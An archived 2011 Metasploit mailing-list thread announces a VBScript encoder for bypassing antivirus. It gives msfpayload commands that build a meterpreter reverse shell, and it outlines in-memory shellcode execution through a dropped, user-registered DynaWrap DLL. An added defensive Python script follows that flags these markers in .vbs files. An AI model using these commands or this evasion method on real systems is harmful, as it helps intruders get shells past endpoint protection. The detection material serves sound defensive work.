Metasploit mailing list archives
Re: Additional encoder option 'vbsmem' for AV bypass
From: "5.K1dd" <5.k1dd () austinhackers org>
Date: Sat, 05 Mar 2011 09:35:11 -0600
Nice! AV detection is the Achilles heel of Metasploit. Efforts to bypass detection are always appreciated. Thanks, Blair. To the Metasploit Gods: Will this script be added to svn?
Hi,

I've submitted a feature request with a patch included which implements a new VBScript-based encoder for msfencode.

https://www.metasploit.com/redmine/issues/3894

You might want to use this if you find that your payloads are getting picked up by certain on access virus scanners... Full details are available in the ticket and included below the jump. Feedback or suggestions welcome.

Thanks,
Blair.

-----------------------------------------------------------------

== SUMMARY ==

* New exe encoder option for metasploit (Adds "-t vbsmem" to msfencode)
* Achieves 0/43 (no detection) on virustotal.com for arbitrary metasploit shellcode payloads. Straight revshell is 20/43.
* Uses vbscript with DynaWrap COM control (dropped and registered) to directly execute shellcode in memory, without triggering on-access virus scanners.
* Standard VBScript string obfuscation techniques are used to hide the actual shellcode from AV software.

== Examples ==

Reverse shell

./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.120.1 LPORT=4444 R | ./msfencode -t vbsmem > revshell.vbs

Pop calc poc

./msfpayload windows/exec EXITFUNC=process CMD='calc.exe' R | ./msfencode -t vbsmem > popcalc.vbs

== About ==

The first version of this encoder was written during a pentesting engagement. The target was running Microsoft Forefront Endpoint Protection with on-access scanning. It was possible to run commands, but I just couldn't get a meterpreter shell on there. After a frustrating session of multiply encoding, repacking and so on, the shellcode kept getting picked up.

Existing VBScript payloads are not themselves picked up by AV, but when they drop files on the target, on-access scanning detects the payloads. After noting that the existing VBScript payloads themselves aren't picked up (just when they drop), I decided to apply a trick from Didier Stevens to execute the shellcode directly, without dropping.

See: http://blog.didierstevens.com/2010/02/08/excel-with-cmd-dll-regedit-dll/

This encoder writes shellcode into a vbscript file which performs the following actions:

* Drops Dynawrap.dll in TEMP
* Manually registers the control under HKEY_CURRENT_USER
* Uses DynaWrap.dll to call native APIs...
  o VirtualAlloc (make space)
  o WriteProcessMemory (copy shellcode)
  o CreateThread (execute)

Standard VBScript string obfuscation techniques are used to hide the actual shellcode from AV software.

== Licensing ==

The Dynawrap control was written by Ton Plooy and Jeff Strong and published in WDJ. As I understand it, this code is in the public domain and has been used in other open-source projects. The vbsmem code is provided under the same licensing terms as the metasploit project.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
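The message above lists the observable steps of the vbsmem loader (a DynaWrap COM control dropped to TEMP, manual registration under HKEY_CURRENT_USER, then VirtualAlloc / WriteProcessMemory / CreateThread through that control, with the shellcode hidden by VBScript string obfuscation). The script below is an added defensive example, not code from the thread, the ticket or Metasploit: it triages a .vbs file for that combination of markers so an analyst can spot the pattern on disk or in mail attachments. The indicator names, weights, thresholds, the reading of "standard string obfuscation" as Chr() concatenation, and the GetSpecialFolder(2) check are assumptions made for this example; both sample scripts are constructed and the suspicious one is deliberately not a working loader.

```python
"""Heuristic triage of a VBScript file for the in-memory shellcode loader
pattern described in the thread: a DynaWrap COM control dropped to TEMP,
registered under HKEY_CURRENT_USER, then used to reach VirtualAlloc,
WriteProcessMemory and CreateThread, with the payload hidden by string
obfuscation. Added defensive example; not Metasploit or vbsmem code.
Indicator names, weights and thresholds are assumptions for this example.
"""
import re

# (name, pattern, weight). Weights are assumptions, not measured values.
INDICATORS = [
    ("dynawrap_reference", re.compile(r"dynawrap", re.I), 3),
    # Manual COM registration in the user hive, which needs no admin rights.
    ("hkcu_com_registration",
     re.compile(r"RegWrite[^\n]*(HKCU|HKEY_CURRENT_USER)\\Software\\Classes\\CLSID", re.I), 3),
    # Locating TEMP via the env var or FileSystemObject.GetSpecialFolder(2).
    ("temp_dir_lookup", re.compile(r"%TEMP%|\"TEMP\"|GetSpecialFolder\s*\(\s*2\s*\)", re.I), 1),
    ("dll_path_literal", re.compile(r"\.dll\"", re.I), 1),
    ("virtualalloc", re.compile(r"VirtualAlloc", re.I), 2),
    ("writeprocessmemory", re.compile(r"WriteProcessMemory", re.I), 2),
    ("createthread", re.compile(r"CreateThread", re.I), 2),
]
# Chr()/ChrB()/ChrW() used to assemble a byte string at run time (assumed
# meaning of "standard VBScript string obfuscation" in the message).
CHR_CALL = re.compile(r"\bChr[BW]?\s*\(", re.I)
CHR_THRESHOLD = 16      # assumption: this many Chr() calls is unusual in admin scripts
SUSPICIOUS_SCORE = 5    # assumption: triage threshold on the weighted score


def triage_vbscript(text: str) -> dict:
    """Return indicator hits, a weighted score and a verdict for one script."""
    hits, score = {}, 0
    for name, pattern, weight in INDICATORS:
        found = pattern.search(text) is not None
        hits[name] = found
        if found:
            score += weight
    chr_calls = len(CHR_CALL.findall(text))
    hits["heavy_chr_obfuscation"] = chr_calls >= CHR_THRESHOLD
    if hits["heavy_chr_obfuscation"]:
        score += 2
    # The allocate / write / execute triad is the core of the technique;
    # treat it as sufficient on its own even if nothing else matched.
    api_triad = hits["virtualalloc"] and hits["writeprocessmemory"] and hits["createthread"]
    verdict = "suspicious" if api_triad or score >= SUSPICIOUS_SCORE else "benign"
    return {"indicators": hits, "chr_calls": chr_calls, "score": score, "verdict": verdict}


def triage_file(path: str) -> dict:
    """Triage a .vbs file on disk (decoded leniently; VBS is often cp1252)."""
    with open(path, "r", encoding="cp1252", errors="replace") as fh:
        return triage_vbscript(fh.read())


# Constructed benign sample: a typical logon script that also writes HKCU.
BENIGN_SAMPLE = r"""
' constructed benign logon script
Set net = CreateObject("WScript.Network")
net.MapNetworkDrive "H:", "\\fileserver\home"
Set sh = CreateObject("WScript.Shell")
sh.RegWrite "HKCU\Software\Example\LastLogon", Now, "REG_SZ"
"""

# Constructed indicator sample: carries the markers the thread describes but
# is deliberately not a working script (no DLL bytes, no call sequence).
SUSPICIOUS_SAMPLE = r"""
' constructed indicator sample for testing
Set sh = CreateObject("WScript.Shell")
tmp = sh.ExpandEnvironmentStrings("%TEMP%")
dll = tmp & "\DynaWrap.dll"
' (file write omitted in this constructed sample)
sh.RegWrite "HKCU\Software\Classes\CLSID\{PLACEHOLDER-CLSID}\InProcServer32\", dll
' the control would then be asked to resolve VirtualAlloc, WriteProcessMemory, CreateThread
buf = """ + " & ".join(f"Chr({b})" for b in range(65, 89)) + "\n"


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        r = triage_vbscript(sample)
        print(f"{label}: verdict={r['verdict']} score={r['score']} chr_calls={r['chr_calls']}")
```

The benign sample scores zero even though it writes under HKCU, because only a CLSID registration counts; the indicator sample trips every marker plus the Chr() density check. On a real estate the same markers map to host telemetry: a DLL written to the user's TEMP, a new HKCU\Software\Classes\CLSID entry pointing at it, and wscript.exe as the parent of a thread in a freshly allocated executable region.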
Current thread:
- Additional encoder option 'vbsmem' for AV bypass Blair Strang (Mar 04)
- Re: Additional encoder option 'vbsmem' for AV bypass 5.K1dd (Mar 05)